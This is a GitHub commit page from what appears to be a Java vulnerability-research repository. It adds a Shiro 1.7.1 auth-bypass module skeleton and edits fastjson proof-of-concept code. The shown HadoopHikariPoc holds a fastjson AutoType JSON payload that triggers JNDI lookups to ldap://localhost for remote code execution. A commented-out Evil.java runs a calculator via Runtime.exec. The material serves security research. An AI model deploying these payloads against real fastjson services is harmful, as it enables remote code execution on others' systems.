Skip to content

Commit 2f802e6

Browse files
author
threedr3am
committed
添加shiro 1.7.1 auth bypass
1 parent 04790a2 commit 2f802e6

File tree

15 files changed

+218
-257
lines changed

15 files changed

+218
-257
lines changed

fastjson/pom.xml

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -171,5 +171,19 @@
171171
<artifactId>ignite-jta</artifactId>
172172
<version>2.8.0</version>
173173
</dependency>
174+
175+
<dependency>
176+
<groupId>mysql</groupId>
177+
<artifactId>mysql-connector-java</artifactId>
178+
<version>8.0.14</version>
179+
</dependency>
180+
181+
<!-- https://mvnrepository.com/artifact/commons-io/commons-io -->
182+
<dependency>
183+
<groupId>commons-io</groupId>
184+
<artifactId>commons-io</artifactId>
185+
<version>2.7</version>
186+
</dependency>
187+
174188
</dependencies>
175189
</project>

fastjson/src/main/java/Evil.java

Lines changed: 27 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,27 @@
1+
//import java.io.IOException;
2+
//import java.nio.charset.Charset;
3+
//import java.util.HashSet;
4+
//import java.util.Iterator;
5+
//
6+
///**
7+
// * @author threedr3am
8+
// */
9+
//public class Evil extends java.nio.charset.spi.CharsetProvider {
10+
//
11+
// @Override
12+
// public Iterator<Charset> charsets() {
13+
// return new HashSet<Charset>().iterator();
14+
// }
15+
//
16+
// @Override
17+
// public Charset charsetForName(String charsetName) {
18+
// if (charsetName.startsWith("Evil")) {
19+
// try {
20+
// Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
21+
// } catch (IOException e) {
22+
// e.printStackTrace();
23+
// }
24+
// }
25+
// return Charset.forName("UTF-8");
26+
// }
27+
//}

fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HadoopHikariPoc.java

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -3,6 +3,7 @@
33
import com.alibaba.fastjson.JSON;
44
import com.alibaba.fastjson.parser.ParserConfig;
55
import com.threedr3am.bug.common.server.LdapServer;
6+
import com.threedr3am.bug.common.server.RmiServer;
67

78
/**
89
* fastjson <= 1.2.68 RCE,需要开启AutoType (report by threedr3am to ASRC)
@@ -27,8 +28,8 @@ public class HadoopHikariPoc {
2728
public static void main(String[] args) {
2829
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
2930

30-
String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}";
31-
String payload2 = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";
31+
// String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://localhost:43657/Calc\"}";
32+
String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";
3233
JSON.parse(payload);
3334
}
3435
}

fastjson/src/main/java/com/threedr3am/bug/fastjson/test/A.java

Lines changed: 0 additions & 53 deletions
This file was deleted.

fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Bypass.java

Lines changed: 0 additions & 43 deletions
This file was deleted.

fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Test.java

Lines changed: 0 additions & 79 deletions
This file was deleted.

fastjson/src/main/java/com/threedr3am/bug/fastjson/test/TestPoc.java

Lines changed: 0 additions & 80 deletions
This file was deleted.

pom.xml

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -27,6 +27,7 @@
2727
<module>nexus</module>
2828
<module>apache-poi</module>
2929
<module>java-compile</module>
30+
<module>auth-bypass(shiro=1.7.1)</module>
3031
</modules>
3132

3233
<name>learn-java-bug</name>

shiro/auth-bypass(shiro=1.7.1)/pom.xml

Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<project xmlns="http://maven.apache.org/POM/4.0.0"
3+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
5+
<parent>
6+
<groupId>org.springframework.boot</groupId>
7+
<artifactId>spring-boot-starter-parent</artifactId>
8+
<version>1.5.22.RELEASE</version>
9+
<relativePath/>
10+
</parent>
11+
<modelVersion>4.0.0</modelVersion>
12+
13+
<artifactId>auth-bypass(shiro=1.7.1)</artifactId>
14+
15+
<properties>
16+
<maven.compiler.source>8</maven.compiler.source>
17+
<maven.compiler.target>8</maven.compiler.target>
18+
</properties>
19+
20+
<dependencies>
21+
<dependency>
22+
<groupId>org.springframework.boot</groupId>
23+
<artifactId>spring-boot-starter-web</artifactId>
24+
</dependency>
25+
26+
<dependency>
27+
<groupId>org.apache.shiro</groupId>
28+
<artifactId>shiro-web</artifactId>
29+
<version>1.7.1</version>
30+
</dependency>
31+
<dependency>
32+
<groupId>org.apache.shiro</groupId>
33+
<artifactId>shiro-spring</artifactId>
34+
<version>1.7.1</version>
35+
</dependency>
36+
</dependencies>
37+
38+
</project>

shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
package me.threedr3am.bug.shiro.bypass.auth;
2+
3+
import org.springframework.boot.SpringApplication;
4+
import org.springframework.boot.autoconfigure.SpringBootApplication;
5+
6+
@SpringBootApplication
7+
public class Application {
8+
9+
public static void main(String[] args) {
10+
SpringApplication.run(Application.class, args);
11+
}
12+
13+
}

0 commit comments

Comments
 (0)